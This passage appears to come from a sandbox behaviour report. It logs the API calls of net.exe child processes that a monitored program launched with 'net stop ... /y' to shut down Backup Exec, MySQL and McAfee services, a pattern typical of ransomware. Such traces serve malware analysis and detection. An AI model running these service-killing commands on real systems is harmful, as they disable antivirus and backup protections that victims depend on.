_String2="BackupExecDeviceMediaService") returned 12 [0201.154] _wcsupr (in: _String="BackupExecDeviceMediaService" | out: _String="BACKUPEXECDEVICEMEDIASERVICE") returned="BACKUPEXECDEVICEMEDIASERVICE" [0201.154] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3354e0 [0201.157] GetServiceKeyNameW (in: hSCManager=0x3354e0, lpDisplayName="BACKUPEXECDEVICEMEDIASERVICE", lpServiceName=0x1faaf0, lpcchBuffer=0x30fc20 | out: lpServiceName="", lpcchBuffer=0x30fc20) returned 0 [0201.158] _wcsicmp (_String1="msg", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 11 [0201.158] _wcsicmp (_String1="messenger", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 11 [0201.158] _wcsicmp (_String1="receiver", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 16 [0201.158] _wcsicmp (_String1="rcv", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 16 [0201.158] _wcsicmp (_String1="redirector", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 16 [0201.158] _wcsicmp (_String1="redir", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 16 [0201.158] _wcsicmp (_String1="rdr", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 16 [0201.158] _wcsicmp (_String1="workstation", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 21 [0201.158] _wcsicmp (_String1="work", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 21 [0201.158] _wcsicmp (_String1="wksta", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 21 [0201.158] _wcsicmp (_String1="prdr", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 14 [0201.158] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 2 [0201.158] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 10 [0201.158] _wcsicmp (_String1="server", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 17 [0201.158] _wcsicmp (_String1="svr", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 17 [0201.158] _wcsicmp (_String1="srv", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 17 [0201.158] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 10 [0201.158] _wcsicmp (_String1="alerter", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned -1 [0201.158] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECDEVICEMEDIASERVICE") returned 12 [0201.158] NetServiceControl (in: servername=0x0, service="BACKUPEXECDEVICEMEDIASERVICE", opcode=0x0, arg=0x0, bufptr=0x30fc1c | out: bufptr=0x30fc1c) returned 0x889 [0201.159] wcscpy_s (in: _Destination=0x1fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0201.159] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0201.160] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x1fb338, nSize=0x800, Arguments=0x1f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0201.161] GetFileType (hFile=0x26c) returned 0x3 [0201.161] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x333ca8 [0201.161] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x333ca8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0201.161] WriteFile (in: hFile=0x26c, lpBuffer=0x333ca8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x30fb5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fb5c, lpOverlapped=0x0) returned 0 [0201.161] LocalFree (hMem=0x333ca8) returned 0x0 [0201.161] GetFileType (hFile=0x26c) returned 0x3 [0201.161] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3362a8 [0201.161] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3362a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n3", lpUsedDefaultChar=0x0) returned 2 [0201.161] WriteFile (in: hFile=0x26c, lpBuffer=0x3362a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30fb5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fb5c, lpOverlapped=0x0) returned 0 [0201.161] LocalFree (hMem=0x3362a8) returned 0x0 [0201.161] _ultow (in: _Dest=0x889, _Radix=3210124 | out: _Dest=0x889) returned="2185" [0201.161] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x1fb338, nSize=0x800, Arguments=0x1f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0201.161] GetFileType (hFile=0x26c) returned 0x3 [0201.162] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3362a8 [0201.162] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3362a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0201.162] WriteFile (in: hFile=0x26c, lpBuffer=0x3362a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x30fb68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fb68, lpOverlapped=0x0) returned 0 [0201.162] LocalFree (hMem=0x3362a8) returned 0x0 [0201.162] GetFileType (hFile=0x26c) returned 0x3 [0201.162] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3362a8 [0201.162] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3362a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n3", lpUsedDefaultChar=0x0) returned 2 [0201.162] WriteFile (in: hFile=0x26c, lpBuffer=0x3362a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30fb68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fb68, lpOverlapped=0x0) returned 0 [0201.162] LocalFree (hMem=0x3362a8) returned 0x0 [0201.162] NetApiBufferFree (Buffer=0x331c98) returned 0x0 [0201.162] NetApiBufferFree (Buffer=0x331cb0) returned 0x0 [0201.162] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecDeviceMediaService /y" [0201.163] exit (_Code=2) Process: id = "178" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x56481000" os_pid = "0x594" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MySQL57 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 351 os_tid = 0x6b8 Process: id = "179" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x60744000" os_pid = "0x744" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "178" os_parent_pid = "0x594" cmd_line = "C:\\Windows\\system32\\net1 stop MySQL57 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 352 os_tid = 0x110 [0201.322] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15fa10 | out: lpSystemTimeAsFileTime=0x15fa10*(dwLowDateTime=0x4130da80, dwHighDateTime=0x1d57a87)) [0201.322] GetCurrentProcessId () returned 0x744 [0201.322] GetCurrentThreadId () returned 0x110 [0201.322] GetTickCount () returned 0x116bf88 [0201.322] QueryPerformanceCounter (in: lpPerformanceCount=0x15fa08 | out: lpPerformanceCount=0x15fa08*=32160699659) returned 1 [0201.323] GetModuleHandleA (lpModuleName=0x0) returned 0x340000 [0201.323] __set_app_type (_Type=0x1) [0201.323] __p__fmode () returned 0x74eb31f4 [0201.323] __p__commode () returned 0x74eb31fc [0201.323] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x34ffe6) returned 0x0 [0201.323] __getmainargs (in: _Argc=0x359064, _Argv=0x35906c, _Env=0x359068, _DoWildCard=0, _StartInfo=0x359024 | out: _Argc=0x359064, _Argv=0x35906c, _Env=0x359068) returned 0 [0201.323] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.323] GetConsoleOutputCP () returned 0x1b5 [0201.323] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x359080 | out: lpCPInfo=0x359080) returned 1 [0201.323] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.326] sprintf_s (in: _DstBuf=0x15f9c8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0201.326] setlocale (category=0, locale=".437") returned="English_United States.437" [0201.328] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0201.328] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0201.328] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL57 /y" [0201.328] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x15f794, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0201.328] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x62) returned 0x723c00 [0201.329] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0201.329] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x15f998 | out: Buffer=0x15f998*=0x721c60) returned 0x0 [0201.329] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x15f998 | out: Buffer=0x15f998*=0x721c78) returned 0x0 [0201.329] _fileno (_File=0x74eb2900) returned -2 [0201.329] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0201.329] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0201.329] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0201.329] _wcsicmp (_String1="config", _String2="stop") returned -16 [0201.329] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0201.329] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0201.329] _wcsicmp (_String1="file", _String2="stop") returned -13 [0201.329] _wcsicmp (_String1="files", _String2="stop") returned -13 [0201.329] _wcsicmp (_String1="group", _String2="stop") returned -12 [0201.329] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0201.329] _wcsicmp (_String1="help", _String2="stop") returned -11 [0201.329] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0201.329] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0201.329] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0201.329] _wcsicmp (_String1="session", _String2="stop") returned -15 [0201.329] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0201.329] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0201.329] _wcsicmp (_String1="share", _String2="stop") returned -12 [0201.329] _wcsicmp (_String1="start", _String2="stop") returned -14 [0201.330] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0201.330] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0201.330] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0201.330] _wcsicmp (_String1="accounts", _String2="MySQL57") returned -12 [0201.330] _wcsicmp (_String1="computer", _String2="MySQL57") returned -10 [0201.330] _wcsicmp (_String1="config", _String2="MySQL57") returned -10 [0201.330] _wcsicmp (_String1="continue", _String2="MySQL57") returned -10 [0201.330] _wcsicmp (_String1="cont", _String2="MySQL57") returned -10 [0201.330] _wcsicmp (_String1="file", _String2="MySQL57") returned -7 [0201.330] _wcsicmp (_String1="files", _String2="MySQL57") returned -7 [0201.330] _wcsicmp (_String1="group", _String2="MySQL57") returned -6 [0201.330] _wcsicmp (_String1="groups", _String2="MySQL57") returned -6 [0201.330] _wcsicmp (_String1="help", _String2="MySQL57") returned -5 [0201.330] _wcsicmp (_String1="helpmsg", _String2="MySQL57") returned -5 [0201.330] _wcsicmp (_String1="localgroup", _String2="MySQL57") returned -1 [0201.330] _wcsicmp (_String1="pause", _String2="MySQL57") returned 3 [0201.330] _wcsicmp (_String1="session", _String2="MySQL57") returned 6 [0201.330] _wcsicmp (_String1="sessions", _String2="MySQL57") returned 6 [0201.330] _wcsicmp (_String1="sess", _String2="MySQL57") returned 6 [0201.330] _wcsicmp (_String1="share", _String2="MySQL57") returned 6 [0201.330] _wcsicmp (_String1="start", _String2="MySQL57") returned 6 [0201.330] _wcsicmp (_String1="stats", _String2="MySQL57") returned 6 [0201.330] _wcsicmp (_String1="statistics", _String2="MySQL57") returned 6 [0201.330] _wcsicmp (_String1="stop", _String2="MySQL57") returned 6 [0201.330] _wcsicmp (_String1="time", _String2="MySQL57") returned 7 [0201.330] _wcsicmp (_String1="user", _String2="MySQL57") returned 8 [0201.330] _wcsicmp (_String1="users", _String2="MySQL57") returned 8 [0201.330] _wcsicmp (_String1="msg", _String2="MySQL57") returned -6 [0201.330] _wcsicmp (_String1="messenger", _String2="MySQL57") returned -20 [0201.330] _wcsicmp (_String1="receiver", _String2="MySQL57") returned 5 [0201.330] _wcsicmp (_String1="rcv", _String2="MySQL57") returned 5 [0201.330] _wcsicmp (_String1="netpopup", _String2="MySQL57") returned 1 [0201.330] _wcsicmp (_String1="redirector", _String2="MySQL57") returned 5 [0201.330] _wcsicmp (_String1="redir", _String2="MySQL57") returned 5 [0201.330] _wcsicmp (_String1="rdr", _String2="MySQL57") returned 5 [0201.330] _wcsicmp (_String1="workstation", _String2="MySQL57") returned 10 [0201.330] _wcsicmp (_String1="work", _String2="MySQL57") returned 10 [0201.330] _wcsicmp (_String1="wksta", _String2="MySQL57") returned 10 [0201.330] _wcsicmp (_String1="prdr", _String2="MySQL57") returned 3 [0201.331] _wcsicmp (_String1="devrdr", _String2="MySQL57") returned -9 [0201.331] _wcsicmp (_String1="lanmanworkstation", _String2="MySQL57") returned -1 [0201.331] _wcsicmp (_String1="server", _String2="MySQL57") returned 6 [0201.331] _wcsicmp (_String1="svr", _String2="MySQL57") returned 6 [0201.331] _wcsicmp (_String1="srv", _String2="MySQL57") returned 6 [0201.331] _wcsicmp (_String1="lanmanserver", _String2="MySQL57") returned -1 [0201.331] _wcsicmp (_String1="alerter", _String2="MySQL57") returned -12 [0201.331] _wcsicmp (_String1="netlogon", _String2="MySQL57") returned 1 [0201.331] _wcsupr (in: _String="MySQL57" | out: _String="MYSQL57") returned="MYSQL57" [0201.331] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7254b8 [0201.334] GetServiceKeyNameW (in: hSCManager=0x7254b8, lpDisplayName="MYSQL57", lpServiceName=0x35aaf0, lpcchBuffer=0x15f934 | out: lpServiceName="", lpcchBuffer=0x15f934) returned 0 [0201.334] _wcsicmp (_String1="msg", _String2="MYSQL57") returned -6 [0201.334] _wcsicmp (_String1="messenger", _String2="MYSQL57") returned -20 [0201.334] _wcsicmp (_String1="receiver", _String2="MYSQL57") returned 5 [0201.334] _wcsicmp (_String1="rcv", _String2="MYSQL57") returned 5 [0201.334] _wcsicmp (_String1="redirector", _String2="MYSQL57") returned 5 [0201.334] _wcsicmp (_String1="redir", _String2="MYSQL57") returned 5 [0201.334] _wcsicmp (_String1="rdr", _String2="MYSQL57") returned 5 [0201.334] _wcsicmp (_String1="workstation", _String2="MYSQL57") returned 10 [0201.334] _wcsicmp (_String1="work", _String2="MYSQL57") returned 10 [0201.334] _wcsicmp (_String1="wksta", _String2="MYSQL57") returned 10 [0201.334] _wcsicmp (_String1="prdr", _String2="MYSQL57") returned 3 [0201.334] _wcsicmp (_String1="devrdr", _String2="MYSQL57") returned -9 [0201.334] _wcsicmp (_String1="lanmanworkstation", _String2="MYSQL57") returned -1 [0201.334] _wcsicmp (_String1="server", _String2="MYSQL57") returned 6 [0201.334] _wcsicmp (_String1="svr", _String2="MYSQL57") returned 6 [0201.334] _wcsicmp (_String1="srv", _String2="MYSQL57") returned 6 [0201.334] _wcsicmp (_String1="lanmanserver", _String2="MYSQL57") returned -1 [0201.334] _wcsicmp (_String1="alerter", _String2="MYSQL57") returned -12 [0201.334] _wcsicmp (_String1="netlogon", _String2="MYSQL57") returned 1 [0201.335] NetServiceControl (in: servername=0x0, service="MYSQL57", opcode=0x0, arg=0x0, bufptr=0x15f930 | out: bufptr=0x15f930) returned 0x889 [0201.335] wcscpy_s (in: _Destination=0x35a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0201.335] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0201.336] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x35b338, nSize=0x800, Arguments=0x359dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0201.337] GetFileType (hFile=0x26c) returned 0x3 [0201.337] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x723fe8 [0201.337] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x723fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0201.337] WriteFile (in: hFile=0x26c, lpBuffer=0x723fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x15f870, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x15f870, lpOverlapped=0x0) returned 0 [0201.337] LocalFree (hMem=0x723fe8) returned 0x0 [0201.337] GetFileType (hFile=0x26c) returned 0x3 [0201.337] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x726290 [0201.337] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x726290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nr", lpUsedDefaultChar=0x0) returned 2 [0201.337] WriteFile (in: hFile=0x26c, lpBuffer=0x726290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x15f870, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x15f870, lpOverlapped=0x0) returned 0 [0201.338] LocalFree (hMem=0x726290) returned 0x0 [0201.338] _ultow (in: _Dest=0x889, _Radix=1439904 | out: _Dest=0x889) returned="2185" [0201.338] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x35b338, nSize=0x800, Arguments=0x359dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0201.338] GetFileType (hFile=0x26c) returned 0x3 [0201.338] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x726290 [0201.338] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x726290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0201.338] WriteFile (in: hFile=0x26c, lpBuffer=0x726290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x15f87c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x15f87c, lpOverlapped=0x0) returned 0 [0201.338] LocalFree (hMem=0x726290) returned 0x0 [0201.338] GetFileType (hFile=0x26c) returned 0x3 [0201.338] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x726290 [0201.338] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x726290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nr", lpUsedDefaultChar=0x0) returned 2 [0201.338] WriteFile (in: hFile=0x26c, lpBuffer=0x726290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x15f87c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x15f87c, lpOverlapped=0x0) returned 0 [0201.338] LocalFree (hMem=0x726290) returned 0x0 [0201.339] NetApiBufferFree (Buffer=0x721c60) returned 0x0 [0201.339] NetApiBufferFree (Buffer=0x721c78) returned 0x0 [0201.339] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL57 /y" [0201.339] exit (_Code=2) Process: id = "180" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x15f86000" os_pid = "0xa78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop McAfeeFrameworkMcAfeeFramework /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 353 os_tid = 0xa54 Process: id = "181" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x50857000" os_pid = "0xa8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "180" os_parent_pid = "0xa78" cmd_line = "C:\\Windows\\system32\\net1 stop McAfeeFrameworkMcAfeeFramework /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 354 os_tid = 0xb40 [0201.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfe98 | out: lpSystemTimeAsFileTime=0xcfe98*(dwLowDateTime=0x414fcc60, dwHighDateTime=0x1d57a87)) [0201.527] GetCurrentProcessId () returned 0xa8c [0201.527] GetCurrentThreadId () returned 0xb40 [0201.527] GetTickCount () returned 0x116c053 [0201.527] QueryPerformanceCounter (in: lpPerformanceCount=0xcfe90 | out: lpPerformanceCount=0xcfe90*=32181155994) returned 1 [0201.527] GetModuleHandleA (lpModuleName=0x0) returned 0x2f0000 [0201.527] __set_app_type (_Type=0x1) [0201.527] __p__fmode () returned 0x74eb31f4 [0201.527] __p__commode () returned 0x74eb31fc [0201.527] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2fffe6) returned 0x0 [0201.528] __getmainargs (in: _Argc=0x309064, _Argv=0x30906c, _Env=0x309068, _DoWildCard=0, _StartInfo=0x309024 | out: _Argc=0x309064, _Argv=0x30906c, _Env=0x309068) returned 0 [0201.528] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.528] GetConsoleOutputCP () returned 0x1b5 [0201.528] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x309080 | out: lpCPInfo=0x309080) returned 1 [0201.528] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.531] sprintf_s (in: _DstBuf=0xcfe50, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0201.531] setlocale (category=0, locale=".437") returned="English_United States.437" [0201.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0201.533] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0201.533] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeFrameworkMcAfeeFramework /y" [0201.533] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfc1c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0201.533] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x90) returned 0x5f3c48 [0201.533] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0201.534] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfe20 | out: Buffer=0xcfe20*=0x5f1ca8) returned 0x0 [0201.534] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfe20 | out: Buffer=0xcfe20*=0x5f1cc0) returned 0x0 [0201.534] _fileno (_File=0x74eb2900) returned -2 [0201.534] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0201.534] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0201.534] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0201.534] _wcsicmp (_String1="config", _String2="stop") returned -16 [0201.534] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0201.534] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0201.534] _wcsicmp (_String1="file", _String2="stop") returned -13 [0201.534] _wcsicmp (_String1="files", _String2="stop") returned -13 [0201.534] _wcsicmp (_String1="group", _String2="stop") returned -12 [0201.534] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0201.534] _wcsicmp (_String1="help", _String2="stop") returned -11 [0201.534] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0201.534] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0201.534] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0201.534] _wcsicmp (_String1="session", _String2="stop") returned -15 [0201.534] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0201.534] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0201.534] _wcsicmp (_String1="share", _String2="stop") returned -12 [0201.534] _wcsicmp (_String1="start", _String2="stop") returned -14 [0201.534] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0201.534] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0201.534] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0201.534] _wcsicmp (_String1="accounts", _String2="McAfeeFrameworkMcAfeeFramework") returned -12 [0201.534] _wcsicmp (_String1="computer", _String2="McAfeeFrameworkMcAfeeFramework") returned -10 [0201.534] _wcsicmp (_String1="config", _String2="McAfeeFrameworkMcAfeeFramework") returned -10 [0201.534] _wcsicmp (_String1="continue", _String2="McAfeeFrameworkMcAfeeFramework") returned -10 [0201.534] _wcsicmp (_String1="cont", _String2="McAfeeFrameworkMcAfeeFramework") returned -10 [0201.534] _wcsicmp (_String1="file", _String2="McAfeeFrameworkMcAfeeFramework") returned -7 [0201.534] _wcsicmp (_String1="files", _String2="McAfeeFrameworkMcAfeeFramework") returned -7 [0201.534] _wcsicmp (_String1="group", _String2="McAfeeFrameworkMcAfeeFramework") returned -6 [0201.535] _wcsicmp (_String1="groups", _String2="McAfeeFrameworkMcAfeeFramework") returned -6 [0201.535] _wcsicmp (_String1="help", _String2="McAfeeFrameworkMcAfeeFramework") returned -5 [0201.535] _wcsicmp (_String1="helpmsg", _String2="McAfeeFrameworkMcAfeeFramework") returned -5 [0201.535] _wcsicmp (_String1="localgroup", _String2="McAfeeFrameworkMcAfeeFramework") 